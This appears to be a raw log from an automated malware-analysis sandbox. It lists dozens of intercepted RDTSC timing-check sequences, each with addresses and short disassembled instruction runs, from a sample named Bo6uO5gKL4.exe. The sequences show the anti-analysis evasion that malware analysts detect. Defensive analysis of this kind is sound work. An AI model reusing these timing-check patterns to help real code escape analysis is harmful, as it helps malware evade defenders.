Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFBBC4 second address: EFBBD0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAACBBF1F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF9E13 second address: EF9E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF9E19 second address: EF9E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FAAACBBF1FEh 0x0000000b push edi 0x0000000c jo 00007FAAACBBF1F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA0C0 second address: EFA0DD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAAD0E3C67h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA0DD second address: EFA0EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007FAAACBBF1F6h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA24E second address: EFA252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA252 second address: EFA256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA256 second address: EFA26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAAD0E3C5Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA26B second address: EFA26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA405 second address: EFA412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FAAAD0E3C56h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA412 second address: EFA436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007FAAACBBF1F6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FAAACBBF1FAh 0x00000018 jno 00007FAAACBBF1F8h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA436 second address: EFA448 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jl 00007FAAAD0E3C56h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA5F7 second address: EFA601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA601 second address: EFA609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA74C second address: EFA762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA762 second address: EFA781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA781 second address: EFA787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFAA50 second address: EFAA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jno 00007FAAAD0E3C58h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFAA5F second address: EFAA67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFAA67 second address: EFAA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFABAC second address: EFABB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFABB0 second address: EFABB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFBA4D second address: EFBA5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FAAACBBF1FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF9817 second address: EF9821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FAAAD0E3C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFE0F9 second address: EFE0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFE0FF second address: EFE10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FAAAD0E3C56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFE10E second address: EFE13F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAACBBF204h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFE13F second address: EFE143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02BC5 second address: F02BC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02BC9 second address: F02BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02D06 second address: F02D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FAAACBBF1F8h 0x0000000c jnc 00007FAAACBBF1FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02E8B second address: F02EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FAAAD0E3C66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02EAC second address: F02EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02EB7 second address: F02ED0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Fh 0x00000007 jns 00007FAAAD0E3C56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02ED0 second address: F02ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F0E76F second address: F0E779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F10A0C second address: F10A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F10A12 second address: F10A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAAD0E3C5Ch 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jno 00007FAAAD0E3C56h 0x00000013 pop edi 0x00000014 jnl 00007FAAAD0E3C61h 0x0000001a popad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007FAAAD0E3C56h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F1334E second address: F13356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F13356 second address: F1335E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F1335E second address: F13368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F13497 second address: F1349C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F1349C second address: F134A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jbe 00007FAAACBBF1F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F18B78 second address: F18B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAAAD0E3C5Dh 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F18B8E second address: F18BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007FAAACBBF210h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F24E51 second address: F24E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E484DB second address: E484E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E484E1 second address: E4850D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C65h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push ebx 0x0000000d pushad 0x0000000e jnp 00007FAAAD0E3C56h 0x00000014 jc 00007FAAAD0E3C56h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2FD17 second address: F2FD29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAAACBBF1F6h 0x0000000a jg 00007FAAACBBF1F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2FD29 second address: F2FD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FAAAD0E3C58h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2FD3B second address: F2FD57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF208h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2E7AD second address: F2E7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2E7B3 second address: F2E7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAAACBBF1F6h 0x0000000a jns 00007FAAACBBF1F6h 0x00000010 popad 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAACBBF1FDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2E7D4 second address: F2E7DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EBD9 second address: F2EBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EBDD second address: F2EBE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EBE1 second address: F2EBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007FAAACBBF1F6h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EBF7 second address: F2EBFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EBFB second address: F2EC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FAAACBBF1FAh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EC1A second address: F2EC1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EC1F second address: F2EC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FAAACBBF202h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EC40 second address: F2EC46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2FA21 second address: F2FA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2FA26 second address: F2FA34 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAAD0E3C58h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F33C92 second address: F33C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F33C98 second address: F33C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F859B8 second address: F859D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F856BB second address: F856D1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAAAD0E3C56h 0x00000008 jns 00007FAAAD0E3C56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F856D1 second address: F85736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FAAACBBF209h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FAAACBBF210h 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007FAAACBBF202h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push ecx 0x0000001e jg 00007FAAACBBF1F6h 0x00000024 pushad 0x00000025 popad 0x00000026 pop ecx 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 105354D second address: 1053553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1053553 second address: 105355D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAAACBBF1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 105355D second address: 1053567 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAAD0E3C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1053567 second address: 1053578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1053578 second address: 105357F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 105357F second address: 10535AE instructions: 0x00000000 rdtsc 0x00000002 js 00007FAAACBBF212h 0x00000008 jmp 00007FAAACBBF202h 0x0000000d jmp 00007FAAACBBF1FAh 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 jnc 00007FAAACBBF1F6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 105263C second address: 1052640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1052640 second address: 1052646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1052646 second address: 105264B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 105264B second address: 1052651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1052651 second address: 105266D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAD0E3C64h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1052C5B second address: 1052C6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAACBBF1FAh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1052DB3 second address: 1052DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1052F57 second address: 1052F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAACBBF207h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1052F7E second address: 1052F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAD0E3C5Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1053109 second address: 105310D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 105310D second address: 1053113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1053113 second address: 1053119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1055FCA second address: 1055FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1059527 second address: 105952D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 105952D second address: 1059554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAAD0E3C62h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAAD0E3C5Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1059554 second address: 1059559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 735002D second address: 735003C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
